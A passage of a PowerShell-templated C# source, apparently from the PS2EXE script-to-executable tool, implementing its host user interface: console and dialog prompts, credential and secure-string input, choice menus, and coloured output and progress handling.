true;\r\n\t\t}\r\n\r\n\t\tstatic public bool IsErrorRedirected()\r\n\t\t{\r\n\t\t\tUIntPtr hError = GetStdHandle(STDHandle.STD_ERROR_HANDLE);\r\n\t\t\tFileType fileType = (FileType)GetFileType(hError);\r\n\t\t\tif ((fileType == FileType.FILE_TYPE_CHAR) || (fileType == FileType.FILE_TYPE_UNKNOWN))\r\n\t\t\t\treturn false;\r\n\t\t\treturn true;\r\n\t\t}\r\n\t}\r\n\r\n\r\n\tinternal class PS2EXEHostUI : PSHostUserInterface\r\n\t{\r\n\t\tprivate PS2EXEHostRawUI rawUI = null;\r\n\r\n\t\tpublic ConsoleColor ErrorForegroundColor = ConsoleColor.Red;\r\n\t\tpublic ConsoleColor ErrorBackgroundColor = ConsoleColor.Black;\r\n\r\n\t\tpublic ConsoleColor WarningForegroundColor = ConsoleColor.Yellow;\r\n\t\tpublic ConsoleColor WarningBackgroundColor = ConsoleColor.Black;\r\n\r\n\t\tpublic ConsoleColor DebugForegroundColor = ConsoleColor.Yellow;\r\n\t\tpublic ConsoleColor DebugBackgroundColor = ConsoleColor.Black;\r\n\r\n\t\tpublic ConsoleColor VerboseForegroundColor = ConsoleColor.Yellow;\r\n\t\tpublic ConsoleColor VerboseBackgroundColor = ConsoleColor.Black;\r\n\r\n$(if (!$noConsole) {@\"\r\n\t\tpublic ConsoleColor ProgressForegroundColor = ConsoleColor.Yellow;\r\n\"@ } else {@\"\r\n\t\tpublic ConsoleColor ProgressForegroundColor = ConsoleColor.DarkCyan;\r\n\"@ })\r\n\t\tpublic ConsoleColor ProgressBackgroundColor = ConsoleColor.DarkCyan;\r\n\r\n\t\tpublic PS2EXEHostUI() : base()\r\n\t\t{\r\n\t\t\trawUI = new PS2EXEHostRawUI();\r\n$(if (!$noConsole) {@\"\r\n\t\t\trawUI.ForegroundColor = Console.ForegroundColor;\r\n\t\t\trawUI.BackgroundColor = Console.BackgroundColor;\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override Dictionary<string, PSObject> Prompt(string caption, string message, System.Collections.ObjectModel.Collection<FieldDescription> descriptions)\r\n\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\tif (!string.IsNullOrEmpty(caption)) WriteLine(caption);\r\n\t\t\tif (!string.IsNullOrEmpty(message)) WriteLine(message);\r\n\"@ } else {@\"\r\n\t\t\tif ((!string.IsNullOrEmpty(caption)) 
|| (!string.IsNullOrEmpty(message)))\r\n\t\t\t{ string sTitel = System.AppDomain.CurrentDomain.FriendlyName, sMeldung = \"\";\r\n\r\n\t\t\t\tif (!string.IsNullOrEmpty(caption)) sTitel = caption;\r\n\t\t\t\tif (!string.IsNullOrEmpty(message)) sMeldung = message;\r\n\t\t\t\tMessageBox.Show(sMeldung, sTitel);\r\n\t\t\t}\r\n\r\n\t\t\t// reset title and label text for the input box\r\n\t\t\tibcaption = \"\";\r\n\t\t\tibmessage = \"\";\r\n\"@ })\r\n\t\t\tDictionary<string, PSObject> ret = new Dictionary<string, PSObject>();\r\n\t\t\tforeach (FieldDescription cd in descriptions)\r\n\t\t\t{\r\n\t\t\t\tType t = null;\r\n\t\t\t\tif (string.IsNullOrEmpty(cd.ParameterAssemblyFullName))\r\n\t\t\t\t\tt = typeof(string);\r\n\t\t\t\telse\r\n\t\t\t\t\tt = Type.GetType(cd.ParameterAssemblyFullName);\r\n\t\t\t\t// Type.GetType() returns null when the named assembly is not loaded in this process;\r\n\t\t\t\t// fall back to string instead of dereferencing null below\r\n\t\t\t\tif (t == null) t = typeof(string);\r\n\r\n\t\t\t\tif (t.IsArray)\r\n\t\t\t\t{\r\n\t\t\t\t\tType elementType = t.GetElementType();\r\n\t\t\t\t\tType genericListType = Type.GetType(\"System.Collections.Generic.List\"+((char)0x60).ToString()+\"1\");\r\n\t\t\t\t\tgenericListType = genericListType.MakeGenericType(new Type[] { elementType });\r\n\t\t\t\t\tConstructorInfo constructor = genericListType.GetConstructor(BindingFlags.CreateInstance | BindingFlags.Instance | BindingFlags.Public, null, Type.EmptyTypes, null);\r\n\t\t\t\t\tobject resultList = constructor.Invoke(null);\r\n\r\n\t\t\t\t\tint index = 0;\r\n\t\t\t\t\tstring data = \"\";\r\n\t\t\t\t\tdo\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\ttry\r\n\t\t\t\t\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\t\t\t\t\tif (!string.IsNullOrEmpty(cd.Name)) Write(string.Format(\"{0}[{1}]: \", cd.Name, index));\r\n\"@ } else {@\"\r\n\t\t\t\t\t\t\tif (!string.IsNullOrEmpty(cd.Name)) ibmessage = string.Format(\"{0}[{1}]: \", cd.Name, index);\r\n\"@ })\r\n\t\t\t\t\t\t\tdata = ReadLine();\r\n\t\t\t\t\t\t\tif (string.IsNullOrEmpty(data))\r\n\t\t\t\t\t\t\t\tbreak;\r\n\r\n\t\t\t\t\t\t\tobject o = System.Convert.ChangeType(data, elementType);\r\n\t\t\t\t\t\t\tgenericListType.InvokeMember(\"Add\", 
BindingFlags.InvokeMethod | BindingFlags.Public | BindingFlags.Instance, null, resultList, new object[] { o });\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tcatch\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tthrow; // rethrow as-is so the original stack trace is preserved\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tindex++;\r\n\t\t\t\t\t} while (true);\r\n\r\n\t\t\t\t\tSystem.Array retArray = (System.Array)genericListType.InvokeMember(\"ToArray\", BindingFlags.InvokeMethod | BindingFlags.Public | BindingFlags.Instance, null, resultList, null);\r\n\t\t\t\t\tret.Add(cd.Name, new PSObject(retArray));\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tobject o = null;\r\n\t\t\t\t\tstring l = null;\r\n\t\t\t\t\ttry\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tif (t != typeof(System.Security.SecureString))\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tif (t != typeof(System.Management.Automation.PSCredential))\r\n\t\t\t\t\t\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\t\t\t\t\t\tif (!string.IsNullOrEmpty(cd.Name)) Write(cd.Name);\r\n\t\t\t\t\t\t\t\tif (!string.IsNullOrEmpty(cd.HelpMessage)) Write(\" (Type !? for help.)\");\r\n\t\t\t\t\t\t\t\tif ((!string.IsNullOrEmpty(cd.Name)) || (!string.IsNullOrEmpty(cd.HelpMessage))) Write(\": \");\r\n\"@ } else {@\"\r\n\t\t\t\t\t\t\t\tif (!string.IsNullOrEmpty(cd.Name)) ibmessage = string.Format(\"{0}: \", cd.Name);\r\n\t\t\t\t\t\t\t\tif (!string.IsNullOrEmpty(cd.HelpMessage)) ibmessage += \"\\n(Type !? 
for help.)\";\r\n\"@ })\r\n\t\t\t\t\t\t\t\tdo {\r\n\t\t\t\t\t\t\t\t\tl = ReadLine();\r\n\t\t\t\t\t\t\t\t\tif (l == \"!?\")\r\n\t\t\t\t\t\t\t\t\t\tWriteLine(cd.HelpMessage);\r\n\t\t\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\tif (string.IsNullOrEmpty(l)) o = cd.DefaultValue;\r\n\t\t\t\t\t\t\t\t\t\tif (o == null)\r\n\t\t\t\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t\t\t\ttry {\r\n\t\t\t\t\t\t\t\t\t\t\t\to = System.Convert.ChangeType(l, t);\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t\tcatch {\r\n\t\t\t\t\t\t\t\t\t\t\t\tWrite(\"Wrong format, please repeat input: \");\r\n\t\t\t\t\t\t\t\t\t\t\t\tl = \"!?\";\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t} while (l == \"!?\");\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\telse\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\tPSCredential pscred = PromptForCredential(\"\", \"\", \"\", \"\");\r\n\t\t\t\t\t\t\t\to = pscred;\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\t\t\t\t\t\tif (!string.IsNullOrEmpty(cd.Name)) Write(string.Format(\"{0}: \", cd.Name));\r\n\"@ } else {@\"\r\n\t\t\t\t\t\t\t\tif (!string.IsNullOrEmpty(cd.Name)) ibmessage = string.Format(\"{0}: \", cd.Name);\r\n\"@ })\r\n\r\n\t\t\t\t\t\t\tSecureString pwd = null;\r\n\t\t\t\t\t\t\tpwd = ReadLineAsSecureString();\r\n\t\t\t\t\t\t\to = pwd;\r\n\t\t\t\t\t\t}\r\n\r\n\t\t\t\t\t\tret.Add(cd.Name, new PSObject(o));\r\n\t\t\t\t\t}\r\n\t\t\t\t\tcatch\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tthrow; // rethrow as-is so the original stack trace is preserved\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n$(if ($noConsole) {@\"\r\n\t\t\t// reset title and label text for the input box\r\n\t\t\tibcaption = \"\";\r\n\t\t\tibmessage = \"\";\r\n\"@ })\r\n\t\t\treturn ret;\r\n\t\t}\r\n\r\n\t\tpublic override int PromptForChoice(string caption, string message, System.Collections.ObjectModel.Collection<ChoiceDescription> choices, int defaultChoice)\r\n\t\t{\r\n$(if ($noConsole) {@\"\r\n\t\t\tint iReturn = ChoiceBox.Show(choices, 
defaultChoice, caption, message);\r\n\t\t\tif (iReturn == -1) { iReturn = defaultChoice; }\r\n\t\t\treturn iReturn;\r\n\"@ } else {@\"\r\n\t\t\tif (!string.IsNullOrEmpty(caption))\r\n\t\t\t\tWriteLine(caption);\r\n\t\t\tWriteLine(message);\r\n\t\t\tint idx = 0;\r\n\t\t\tSortedList<string, int> res = new SortedList<string, int>();\r\n\t\t\tforeach (ChoiceDescription cd in choices)\r\n\t\t\t{\r\n\t\t\t\tstring lkey = cd.Label.Substring(0, 1), ltext = cd.Label;\r\n\t\t\t\tint pos = cd.Label.IndexOf('&');\r\n\t\t\t\tif (pos > -1)\r\n\t\t\t\t{\r\n\t\t\t\t\tlkey = cd.Label.Substring(pos + 1, 1).ToUpper();\r\n\t\t\t\t\tif (pos > 0)\r\n\t\t\t\t\t\tltext = cd.Label.Substring(0, pos) + cd.Label.Substring(pos + 1);\r\n\t\t\t\t\telse\r\n\t\t\t\t\t\tltext = cd.Label.Substring(1);\r\n\t\t\t\t}\r\n\t\t\t\tres.Add(lkey.ToLower(), idx);\r\n\r\n\t\t\t\tif (idx > 0) Write(\"  \");\r\n\t\t\t\tif (idx == defaultChoice)\r\n\t\t\t\t{\r\n\t\t\t\t\tWrite(ConsoleColor.Yellow, Console.BackgroundColor, string.Format(\"[{0}] {1}\", lkey, ltext));\r\n\t\t\t\t\tif (!string.IsNullOrEmpty(cd.HelpMessage))\r\n\t\t\t\t\t\tWrite(ConsoleColor.Gray, Console.BackgroundColor, string.Format(\" ({0})\", cd.HelpMessage));\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tWrite(ConsoleColor.Gray, Console.BackgroundColor, string.Format(\"[{0}] {1}\", lkey, ltext));\r\n\t\t\t\t\tif (!string.IsNullOrEmpty(cd.HelpMessage))\r\n\t\t\t\t\t\tWrite(ConsoleColor.Gray, Console.BackgroundColor, string.Format(\" ({0})\", cd.HelpMessage));\r\n\t\t\t\t}\r\n\t\t\t\tidx++;\r\n\t\t\t}\r\n\t\t\tWrite(\": \");\r\n\r\n\t\t\ttry\r\n\t\t\t{\r\n\t\t\t\twhile (true)\r\n\t\t\t\t{ string s = Console.ReadLine().ToLower();\r\n\t\t\t\t\tif (res.ContainsKey(s))\r\n\t\t\t\t\t\treturn res[s];\r\n\t\t\t\t\tif (string.IsNullOrEmpty(s))\r\n\t\t\t\t\t\treturn defaultChoice;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tcatch { }\r\n\r\n\t\t\treturn defaultChoice;\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override PSCredential PromptForCredential(string 
caption, string message, string userName, string targetName, PSCredentialTypes allowedCredentialTypes, PSCredentialUIOptions options)\r\n\t\t{\r\n$(if (!$noConsole -and !$credentialGUI) {@\"\r\n\t\t\tif (!string.IsNullOrEmpty(caption)) WriteLine(caption);\r\n\t\t\tWriteLine(message);\r\n\r\n\t\t\tstring un;\r\n\t\t\tif ((string.IsNullOrEmpty(userName)) || ((options & PSCredentialUIOptions.ReadOnlyUserName) == 0))\r\n\t\t\t{\r\n\t\t\t\tWrite(\"User name: \");\r\n\t\t\t\tun = ReadLine();\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tWrite(\"User name: \");\r\n\t\t\t\tif (!string.IsNullOrEmpty(targetName)) Write(targetName + \"\\\\\");\r\n\t\t\t\tWriteLine(userName);\r\n\t\t\t\tun = userName;\r\n\t\t\t}\r\n\t\t\tSecureString pwd = null;\r\n\t\t\tWrite(\"Password: \");\r\n\t\t\tpwd = ReadLineAsSecureString();\r\n\r\n\t\t\tif (string.IsNullOrEmpty(un)) un = \"<NOUSER>\";\r\n\t\t\tif (!string.IsNullOrEmpty(targetName))\r\n\t\t\t{\r\n\t\t\t\tif (un.IndexOf('\\\\') < 0)\r\n\t\t\t\t\tun = targetName + \"\\\\\" + un;\r\n\t\t\t}\r\n\r\n\t\t\tPSCredential c2 = new PSCredential(un, pwd);\r\n\t\t\treturn c2;\r\n\"@ } else {@\"\r\n\t\t\tik.PowerShell.CredentialForm.UserPwd cred = CredentialForm.PromptForPassword(caption, message, targetName, userName, allowedCredentialTypes, options);\r\n\t\t\tif (cred != null)\r\n\t\t\t{\r\n\t\t\t\t// NOTE: unlike the console path, the credential dialog hands the password back as a plain\r\n\t\t\t\t// managed string; copying it into a SecureString does not scrub that plaintext copy, which\r\n\t\t\t\t// stays in process memory until the garbage collector reclaims it\r\n\t\t\t\tSystem.Security.SecureString x = new System.Security.SecureString();\r\n\t\t\t\tforeach (char c in cred.Password.ToCharArray())\r\n\t\t\t\t\tx.AppendChar(c);\r\n\r\n\t\t\t\treturn new PSCredential(cred.User, x);\r\n\t\t\t}\r\n\t\t\treturn null;\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override PSCredential PromptForCredential(string caption, string message, string userName, string targetName)\r\n\t\t{\r\n$(if (!$noConsole -and !$credentialGUI) {@\"\r\n\t\t\tif (!string.IsNullOrEmpty(caption)) WriteLine(caption);\r\n\t\t\tWriteLine(message);\r\n\r\n\t\t\tstring un;\r\n\t\t\tif (string.IsNullOrEmpty(userName))\r\n\t\t\t{\r\n\t\t\t\tWrite(\"User name: 
\");\r\n\t\t\t\tun = ReadLine();\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tWrite(\"User name: \");\r\n\t\t\t\tif (!string.IsNullOrEmpty(targetName)) Write(targetName + \"\\\\\");\r\n\t\t\t\tWriteLine(userName);\r\n\t\t\t\tun = userName;\r\n\t\t\t}\r\n\t\t\tSecureString pwd = null;\r\n\t\t\tWrite(\"Password: \");\r\n\t\t\tpwd = ReadLineAsSecureString();\r\n\r\n\t\t\tif (string.IsNullOrEmpty(un)) un = \"<NOUSER>\";\r\n\t\t\tif (!string.IsNullOrEmpty(targetName))\r\n\t\t\t{\r\n\t\t\t\tif (un.IndexOf('\\\\') < 0)\r\n\t\t\t\t\tun = targetName + \"\\\\\" + un;\r\n\t\t\t}\r\n\r\n\t\t\tPSCredential c2 = new PSCredential(un, pwd);\r\n\t\t\treturn c2;\r\n\"@ } else {@\"\r\n\t\t\tik.PowerShell.CredentialForm.UserPwd cred = CredentialForm.PromptForPassword(caption, message, targetName, userName, PSCredentialTypes.Default, PSCredentialUIOptions.Default);\r\n\t\t\tif (cred != null)\r\n\t\t\t{\r\n\t\t\t\tSystem.Security.SecureString x = new System.Security.SecureString();\r\n\t\t\t\tforeach (char c in cred.Password.ToCharArray())\r\n\t\t\t\t\tx.AppendChar(c);\r\n\r\n\t\t\t\treturn new PSCredential(cred.User, x);\r\n\t\t\t}\r\n\t\t\treturn null;\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tpublic override PSHostRawUserInterface RawUI\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\treturn rawUI;\r\n\t\t\t}\r\n\t\t}\r\n\r\n$(if ($noConsole) {@\"\r\n\t\tprivate string ibcaption;\r\n\t\tprivate string ibmessage;\r\n\"@ })\r\n\r\n\t\tpublic override string ReadLine()\r\n\t\t{\r\n$(if (!$noConsole) {@\"\r\n\t\t\treturn Console.ReadLine();\r\n\"@ } else {@\"\r\n\t\t\tstring sWert = \"\";\r\n\t\t\tif (InputBox.Show(ibcaption, ibmessage, ref sWert) == DialogResult.OK)\r\n\t\t\t\treturn sWert;\r\n\t\t\telse\r\n\t\t\t\treturn \"\";\r\n\"@ })\r\n\t\t}\r\n\r\n\t\tprivate System.Security.SecureString getPassword()\r\n\t\t{\r\n\t\t\tSystem.Security.SecureString pwd = new System.Security.SecureString();\r\n\t\t\twhile (true)\r\n\t\t\t{\r\n\t\t\t\tConsoleKeyInfo i = Console.ReadKey(true);\r\n\t\t\t\tif (i.Key 
== ConsoleKey.Enter)\r\n\t\t\t\t{\r\n\t\t\t\t\tConsole.WriteLine();\r\n\t\t\t\t\tbreak;\r\n\t\t\t\t}\r\n\t\t\t\telse if (i.Key == ConsoleKey.Backspace)\r\n\t\t\t\t{\r\n\t\t\t\t\tif (pwd.Length > 0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tpwd.RemoveAt(pwd.Length - 1);\r\n\t\t\t\t\t\tConsole.Write(\"\\b \\b\");\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\telse if (i.KeyChar != '\\u0000')\r\n\t\t\t\t{\r\n\t\t\t\t\tpwd.AppendChar(i.KeyChar);\r\n\t\t\t\t\tConsole.Write(\"*\");\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\treturn pwd;\r\n\t\t}\r\n\r\n\t\tpublic override System.Security.SecureString ReadLineAsSecureString()\r\n\t\t{\r\n\t\t\tSystem.Security.SecureString secstr = new System.Security.SecureString();\r\n$(if (!$noConsole) {@\"\r\n\t\t\tsecstr = getPassword();\r\n\"@ } else {@\"\r\n\t\t\tstring sWert = \"\";\r\n\r\n\t\t\tif (InputBox.Show(ibcaption, ibmessage, ref sWert, true) == DialogResult.OK)\r\n\t\t\t{\r\n\t\t\t\tforeach (char ch in sWert)\r\n\t\t\t\t\tsecstr.AppendChar(ch);\r\n\t\t\t}\r\n\"@ })\r\n\t\t\treturn secstr;\r\n\t\t}\r\n\r\n\t\t// called by Write-Host\r\n\t\tpublic override void Write(ConsoleColor foregroundColor, ConsoleColor backgroundColor, string value)\r\n\t\t{\r\n$(if (!$noOutput) { if (!$noConsole) {@\"\r\n\t\t\tConsoleColor fgc = Console.ForegroundColor, bgc = Console.BackgroundColor;\r\n\t\t\tConsole.ForegroundColor = foregroundColor;\r\n\t\t\tConsole.BackgroundColor = backgroundColor;\r\n\t\t\tConsole.Write(value);\r\n\t\t\tConsole.ForegroundColor = fgc;\r\n\t\t\tConsole.BackgroundColor = bgc;\r\n\"@ } else {@\"\r\n\t\t\tif ((!string.IsNullOrEmpty(value)) && (value != \"\\n\"))\r\n\t\t\t\tMessageBox.Show(value, System.AppDomain.CurrentDomain.FriendlyName);\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\tpublic override void Write(string value)\r\n\t\t{\r\n$(if (!$noOutput) { if (!$noConsole) {@\"\r\n\t\t\tConsole.Write(value);\r\n\"@ } else {@\"\r\n\t\t\tif ((!string.IsNullOrEmpty(value)) && (value != \"\\n\"))\r\n\t\t\t\tMessageBox.Show(value, 
System.AppDomain.CurrentDomain.FriendlyName);\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\t// called by Write-Debug\r\n\t\tpublic override void WriteDebugLine(string message)\r\n\t\t{\r\n$(if (!$noError) { if (!$noConsole) {@\"\r\n\t\t\tWriteLineInternal(DebugForegroundColor, DebugBackgroundColor, string.Format(\"DEBUG: {0}\", message));\r\n\"@ } else {@\"\r\n\t\t\tMessageBox.Show(message, System.AppDomain.CurrentDomain.FriendlyName, MessageBoxButtons.OK, MessageBoxIcon.Information);\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\t// called by Write-Error\r\n\t\tpublic override void WriteErrorLine(string value)\r\n\t\t{\r\n$(if (!$noError) { if (!$noConsole) {@\"\r\n\t\t\tif (ConsoleInfo.IsErrorRedirected())\r\n\t\t\t\tConsole.Error.WriteLine(string.Format(\"ERROR: {0}\", value));\r\n\t\t\telse\r\n\t\t\t\tWriteLineInternal(ErrorForegroundColor, ErrorBackgroundColor, string.Format(\"ERROR: {0}\", value));\r\n\"@ } else {@\"\r\n\t\t\tMessageBox.Show(value, System.AppDomain.CurrentDomain.FriendlyName, MessageBoxButtons.OK, MessageBoxIcon.Error);\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\tpublic override void WriteLine()\r\n\t\t{\r\n$(if (!$noOutput) { if (!$noConsole) {@\"\r\n\t\t\tConsole.WriteLine();\r\n\"@ } else {@\"\r\n\t\t\tMessageBox.Show(\"\", System.AppDomain.CurrentDomain.FriendlyName);\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\tpublic override void WriteLine(ConsoleColor foregroundColor, ConsoleColor backgroundColor, string value)\r\n\t\t{\r\n$(if (!$noOutput) { if (!$noConsole) {@\"\r\n\t\t\tConsoleColor fgc = Console.ForegroundColor, bgc = Console.BackgroundColor;\r\n\t\t\tConsole.ForegroundColor = foregroundColor;\r\n\t\t\tConsole.BackgroundColor = backgroundColor;\r\n\t\t\tConsole.WriteLine(value);\r\n\t\t\tConsole.ForegroundColor = fgc;\r\n\t\t\tConsole.BackgroundColor = bgc;\r\n\"@ } else {@\"\r\n\t\t\tif ((!string.IsNullOrEmpty(value)) && (value != \"\\n\"))\r\n\t\t\t\tMessageBox.Show(value, System.AppDomain.CurrentDomain.FriendlyName);\r\n\"@ } })\r\n\t\t}\r\n\r\n$(if (!$noError -And !$noConsole) 
{@\"\r\n\t\tprivate void WriteLineInternal(ConsoleColor foregroundColor, ConsoleColor backgroundColor, string value)\r\n\t\t{\r\n\t\t\tConsoleColor fgc = Console.ForegroundColor, bgc = Console.BackgroundColor;\r\n\t\t\tConsole.ForegroundColor = foregroundColor;\r\n\t\t\tConsole.BackgroundColor = backgroundColor;\r\n\t\t\tConsole.WriteLine(value);\r\n\t\t\tConsole.ForegroundColor = fgc;\r\n\t\t\tConsole.BackgroundColor = bgc;\r\n\t\t}\r\n\"@ })\r\n\r\n\t\t// called by Write-Output\r\n\t\tpublic override void WriteLine(string value)\r\n\t\t{\r\n$(if (!$noOutput) { if (!$noConsole) {@\"\r\n\t\t\tConsole.WriteLine(value);\r\n\"@ } else {@\"\r\n\t\t\tif ((!string.IsNullOrEmpty(value)) && (value != \"\\n\"))\r\n\t\t\t\tMessageBox.Show(value, System.AppDomain.CurrentDomain.FriendlyName);\r\n\"@ } })\r\n\t\t}\r\n\r\n$(if ($noConsole) {@\"\r\n\t\tpublic ProgressForm pf = null;\r\n\"@ })\r\n\t\tpublic override void WriteProgress(long sourceId, ProgressRecord record)\r\n\t\t{\r\n$(if ($noConsole) {@\"\r\n\t\t\tif (pf == null)\r\n\t\t\t{\r\n\t\t\t\tpf = new ProgressForm(ProgressForegroundColor);\r\n\t\t\t\tpf.Show();\r\n\t\t\t}\r\n\t\t\tpf.Update(record);\r\n\t\t\tif (record.RecordType == ProgressRecordType.Completed)\r\n\t\t\t{\r\n\t\t\t\tif (pf.GetCount() == 0) pf = null;\r\n\t\t\t}\r\n\"@ })\r\n\t\t}\r\n\r\n\t\t// called by Write-Verbose\r\n\t\tpublic override void WriteVerboseLine(string message)\r\n\t\t{\r\n$(if (!$noOutput) { if (!$noConsole) {@\"\r\n\t\t\tWriteLine(VerboseForegroundColor, VerboseBackgroundColor, string.Format(\"VERBOSE: {0}\", message));\r\n\"@ } else {@\"\r\n\t\t\tMessageBox.Show(message, System.AppDomain.CurrentDomain.FriendlyName, MessageBoxButtons.OK, MessageBoxIcon.Information);\r\n\"@ } })\r\n\t\t}\r\n\r\n\t\t// called by Write-Warning\r\n\t\tpublic override void WriteWarningLine(string message)\r\n\t\t{\r\n$(if (!$noError) { if (!$noConsole) {@\"\r\n\t\t\tWriteLineInternal(WarningForegroundColor, WarningBackgroundColor, string.Format(\"WARNING: 
{0}\", message));\r\n\"@ } else {@\"\r\n\t\t\tMessageBox.Show(message, System.AppDomain.CurrentDomain.FriendlyName, MessageBoxButtons.OK, MessageBoxIcon.Warning);\r\n\"@ } })\r\n\t\t}\r\n\t}\r\n\r\n\tinternal class PS2EXEHost : PSHost\r\n\t{\r\n\t\tprivate PS2EXEApp parent;\r\n\t\tprivate PS2EXEHostUI ui = null;\r\n\r\n\t\tprivate CultureInfo originalCultureInfo = System.Threading.Thread.CurrentThread.CurrentCulture;\r\n\r\n\t\tprivate CultureInfo originalUICultureInfo = System.Threading.Thread.CurrentThread.CurrentUICulture;\r\n\r\n\t\tprivate Guid myId = Guid.NewGuid();\r\n\r\n\t\tpublic PS2EXEHost(PS2EXEApp app, PS2EXEHostUI ui)\r\n\t\t{\r\n\t\t\tthis.parent = app;\r\n\t\t\tthis.ui = ui;\r\n\t\t}\r\n\r\n\t\tpublic class ConsoleColorProxy\r\n\t\t{\r\n\t\t\tprivate PS2EXEHostUI _ui;\r\n\r\n\t\t\tpublic ConsoleColorProxy(PS2EXEHostUI ui)\r\n\t\t\t{\r\n\t\t\t\tif (ui == null) throw new ArgumentNullException(\"ui\");\r\n\t\t\t\t_ui = ui;\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor ErrorForegroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.ErrorForegroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.ErrorForegroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor ErrorBackgroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.ErrorBackgroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.ErrorBackgroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor WarningForegroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.WarningForegroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.WarningForegroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor WarningBackgroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.WarningBackgroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.WarningBackgroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor DebugForegroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.DebugForegroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.DebugForegroundColor = value; 
}\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor DebugBackgroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.DebugBackgroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.DebugBackgroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor VerboseForegroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.VerboseForegroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.VerboseForegroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor VerboseBackgroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.VerboseBackgroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.VerboseBackgroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor ProgressForegroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.ProgressForegroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.ProgressForegroundColor = value; }\r\n\t\t\t}\r\n\r\n\t\t\tpublic ConsoleColor ProgressBackgroundColor\r\n\t\t\t{\r\n\t\t\t\tget\r\n\t\t\t\t{ return _ui.ProgressBackgroundColor; }\r\n\t\t\t\tset\r\n\t\t\t\t{ _ui.ProgressBackgroundColor = value; }\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tpublic override PSObject PrivateData\r\n\t\t{\r\n\t\t\tget\r\n\t\t\t{\r\n\t\t\t\tif (ui == null) return null;\r\n\t\t\t\treturn _consoleColorProxy ?? 
